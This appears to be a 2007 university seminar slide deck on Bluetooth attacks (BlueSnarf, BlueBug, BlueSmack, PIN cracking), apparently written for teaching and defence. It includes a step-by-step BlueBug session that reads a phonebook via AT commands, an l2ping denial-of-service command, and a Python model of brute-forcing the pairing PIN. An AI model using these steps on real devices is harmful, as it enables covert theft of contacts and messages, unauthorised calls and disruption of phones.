
24.07.2007 Slide 1/19 Seminar ITS - SS 2007

Bluetooth Security & Hacks

Andreas Becker

Seminar ITS, Ruhr-Universität Bochum

SS 2007

Structure

1. Introduction
   1.1 Bluetooth Basics
2. Bluetooth Security
   2.1 Attacks via Bluetooth - Introduction
   2.2 BlueSnarf
   2.3 BlueSnarf++
   2.4 BlueBug
   2.5 BlueJacking
   2.6 HeloMoto
   2.7 BlueSmack
   2.8 Cracking the Bluetooth PIN
3. Conclusion

Bluetooth Basics

- Originally invented 1994 by Ericsson
- Technology for connections of short range devices
- Bluetooth operates within the license-free ISM band (2.4 - 2.48 GHz)
- To prevent interference: frequency hopping
  - base band frequency switched 1600 times / s
  - ISM band divided into 79 frequency levels, 1 MHz apart
- Connecting two devices: pairing
- Piconet (a, b); aggregation of several piconets into a scatternet (c) [figure]

Bluetooth Basics

- Maximum data rate: 700 kBit/s in Version 1.2, up to 2.1 MBit/s in Version 2.0 + EDR (enhanced data rate)
- Generally low power consumption
- Three different device classes:

  Power Class | Max. output power | Max. operating range
  1           | 100 mW (20 dBm)   | ~ 100 m
  2           | 2.5 mW (4 dBm)    | ~ 20 m
  3           | 1 mW (0 dBm)      | ~ 10 m

- Bluetooth protocol stack: [figure]


Attacks via Bluetooth - Introduction

- Rising popularity of wireless technology, hence rising interest in abusing devices and communication channels
- Interesting facts about the "victim":
  - Is it a mobile phone / PDA / computer?
  - Is it vulnerable to a known software flaw?
  - Which ports are open on the target device?
- Means: social engineering, software tools
- Blooover by the trifinite group: Java application for mobile phones; allows security audits and proof-of-concept attacks
- Slax-based Linux distribution: large series of audit tools, automated attacks

BlueSnarf, BlueSnarf++

- BlueSnarf exploits weak OBEX implementations on mobile phones
  - OPP: Object Push Profile, unauthorised access, for vCards
  - SYNCH: profile for exchange of private data (calendar, contacts, pictures, ...); authorised access!
- Adv (adversary) connects to the OBEX push profile: no authentication, no pairing needed, hence an invisible connection
- In vulnerable implementations the SYNCH profile exists in parallel to OPP: Adv retrieves files via their filenames, unauthorised, via the OPP profile!!! e.g. GET telecom/pb.vcf (contacts)
- Bluetooth being a short range technology is NO security feature! Long Distance Snarf by trifinite.org
- BlueSnarf++: Adv instead connects to the OBEX FTP server
- Solution: firmware update by the manufacturer

BlueBug

- RFCOMM
  - Protocol within the Bluetooth stack
  - Uses physical connections via L2CAP + base band
  - Emulates serial RS-232 connections
  - Up to 60 simultaneous connections (ports, RFCOMM channels)
- Adv needs to know the target's Bluetooth device address, BD_ADDR
- Connects to RFCOMM channel 17; on vulnerable devices an AT parser is listening (backdoor); again, no authentication required
- Adv is now able to execute AT commands: initiate phone calls, read / write SMS, ...
- Adversary stays invisible (no pairing process)!

BlueBug example

    # scan for bluetooth devices:
    oscar@darkside $ hcitool scan
    Scanning...
            00:0E:6D:10:1D:B6       Nokia 6310i
            00:05:7A:01:A3:80       Airbus A380
            00:06:6E:21:69:C2       Bluespoon AX
            00:0F:DE:6C:61:04       T610

    # bind channel 17 of target device to /dev/rfcomm42:
    oscar@darkside $ rfcomm bind 42 00:0E:6D:10:1D:B6 17

    # connect to AT terminal via, for example, cu:
    oscar@darkside $ cu -l /dev/rfcomm42
    Connected.
    AT+CPBS="ME"
    OK
    AT+CPBR=1
    +CPBR: 1,"",,"ParisHilton"
    OK
    ~.
    Disconnected.

BlueBug - conclusion

- Rather simple set of commands, yet an effective attack
- Limited by:
  - the set of available AT commands on the target device
  - the attacker's creativity
- Solution: firmware update

BlueJacking

- No attack in terms of breaking security targets
- vCards: electronic business cards; may get transferred via Bluetooth
- BlueJacking: sending messages, free of charge, via vCards: "You were BlueJacked!"
- Has come into fashion among teenagers
- Users who are not familiar with BlueJacking might think of a virus, a stalker, etc.
- Solution: switch Bluetooth / visibility off!

HeloMoto

- Combination of BlueSnarf and BlueBug
- Exploits a vulnerable implementation of "trusted devices"
- Detected on some Motorola mobile phones
- Adv connects to the OBEX push profile (BlueSnarf), attempts to send a vCard ... and immediately cancels the process
- Vulnerability: the attacker's device remains in the "trusted devices" history; Adv uses this device status for executing AT commands (BlueBug)
- Solution: firmware update by Motorola

BlueSmack

- Denial of Service attack, hence directed at the mobile phone's availability
- Similar to the "Ping of Death" against IP-based devices; makes use of the L2CAP echo request (ping)
- Vulnerable devices reserve an input buffer of fixed length (~ 600 bytes); known for this behaviour: iPaq
- Adv sends an L2CAP ping of length >= 600 bytes; Linux: l2ping -s <num> <bd_addr>
- Buffer overflow, segmentation fault; might get exploited to execute arbitrary code
- Solution: firmware update

Cracking the Bluetooth PIN

- Previous attacks were aiming at insecure implementations; this attack exploits the Bluetooth security architecture itself
- Presented by Yaniv Shaked and Avishai Wool
- Objective: eavesdropping messages during the pairing process, in order to brute force the used Bluetooth PIN
- Security targets of Bluetooth: confidentiality, (device) authentication, integrity
- Three possible security modes: no security efforts; application layer security; LMP (Link Manager Protocol) based security

Pairing Process

- Two Bluetooth devices detect each other via their Link Manager units
- Bluetooth Device Addresses (BD_ADDR) are detected by the inquiry routine
- Depending on device type: the same PIN is entered in both devices
- Subsequent computations are based on the shared PIN:
  1. Creation of the initialization key, Kinit
  2. Confidential exchange of random values
  3. Creation of the link key, Kab, and discarding of Kinit; Kab = f(inputs of both devices)
  4. Mutual authentication, based on Kab

Attacking the Pairing Process

[Figure: attack diagram. From the eavesdropped pairing messages the attacker recomputes Kinit and KAB for each PIN candidate (0000, 1234, 0001, 0002, ...) and repeats until the recomputed SRES* equals the observed SRES'.]

Cracking the PIN - efficiency

- Mostly PINs of 4 digits are used
- Devices with a fixed PIN: generally 0000
- A PIN of 4 digits has been cracked within ~ 63 ms on a Pentium IV @ 3 GHz
- The attack on the pairing process is more powerful than it might appear: pairing is usually performed only once for two devices, but devices may discard link keys due to lack of memory, ..., and an adversary may force two devices to re-pair
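The pairing steps and the search loop of the preceding slides as an added Python model; it is not code from the talk or from Shaked and Wool. HMAC-SHA256 stands in for the SAFER+-based functions E22, E21 and E1, so the data flow (Kinit from the PIN, LK_RANDs masked with Kinit, Kab, the 32-bit SRES) follows the protocol while the cryptography is not Bluetooth's; the device addresses are constructed, one taken from the scan slide.

```python
import hashlib
import hmac
import os

def prf(key: bytes, *parts: bytes) -> bytes:
    """Stand-in for E22/E21/E1 (HMAC-SHA256 cut to 128 bits): the real
    functions are SAFER+ based; only the protocol's data flow is modelled."""
    return hmac.new(key, b"".join(parts), hashlib.sha256).digest()[:16]

def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def pair(pin: str, addr_a: bytes, addr_b: bytes, rng=os.urandom) -> dict:
    """Pair A with B and return only what a passive eavesdropper captures;
    Kinit and Kab themselves never leave the two devices."""
    in_rand = rng(16)
    kinit = prf(pin.encode(), addr_b, in_rand)              # E22: Kinit from PIN
    lk_rand_a, lk_rand_b = rng(16), rng(16)
    masked_a, masked_b = xor(lk_rand_a, kinit), xor(lk_rand_b, kinit)  # sent XOR Kinit
    kab = xor(prf(lk_rand_a, addr_a), prf(lk_rand_b, addr_b))  # E21 per side, XORed
    au_rand = rng(16)
    sres = prf(kab, addr_b, au_rand)[:4]                    # E1: 32-bit response
    return dict(addr_a=addr_a, addr_b=addr_b, in_rand=in_rand, au_rand=au_rand,
                masked_a=masked_a, masked_b=masked_b, sres=sres)

def candidates(digits: int):
    """Candidate order from the slide: 0000 and 1234 first, then the rest."""
    common = ["0000", "1234"] if digits == 4 else []
    yield from common
    for n in range(10 ** digits):
        pin = f"{n:0{digits}d}"
        if pin not in common:
            yield pin

def recover_pin(t: dict, digits: int = 4):
    """Replay the captured pairing with each candidate PIN until the recomputed
    SRES* equals the captured SRES'. Returns (pin, number of candidates tried)."""
    for tries, pin in enumerate(candidates(digits), 1):
        kinit = prf(pin.encode(), t["addr_b"], t["in_rand"])
        lk_a, lk_b = xor(t["masked_a"], kinit), xor(t["masked_b"], kinit)
        kab = xor(prf(lk_a, t["addr_a"]), prf(lk_b, t["addr_b"]))
        if prf(kab, t["addr_b"], t["au_rand"])[:4] == t["sres"]:
            return pin, tries   # a wrong PIN passes only with probability 2^-32
    return None, 10 ** digits

if __name__ == "__main__":
    addr_a = bytes.fromhex("001122334455")   # constructed address for device A
    addr_b = bytes.fromhex("000E6D101DB6")   # the Nokia 6310i from the scan slide
    print(recover_pin(pair("4711", addr_a, addr_b)))   # -> ('4711', 4712)
```

The work is bounded by 10^digits replays of the pairing: the 4-digit case the slide times at ~63 ms needs at most 10^4 of them, whereas a 16-digit PIN would need up to 10^16, which is the substance behind the "short PIN" point in the conclusion.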

Conclusion on Bluetooth Security

- The most important attacks have been presented
  - Attacks against weak implementations: firmware updates!
  - Attack against the Bluetooth architecture itself
- Bluetooth specification issues: security by obscurity
  - Short operating range is not a security feature
  - Frequency hopping is not a cryptographic means
  - Link key of 128 bits reduced to the PIN
- Main problem: the user
  - Chooses a short PIN
  - Is not aware of possible attacks
- Tools are getting improved steadily: Blooover, BackTrack 2, BT Audit, ...
- Users should...
  - Be aware of security risks, especially when prompted for a PIN
  - Turn Bluetooth off when possible

Thank you for your attention!

Any questions?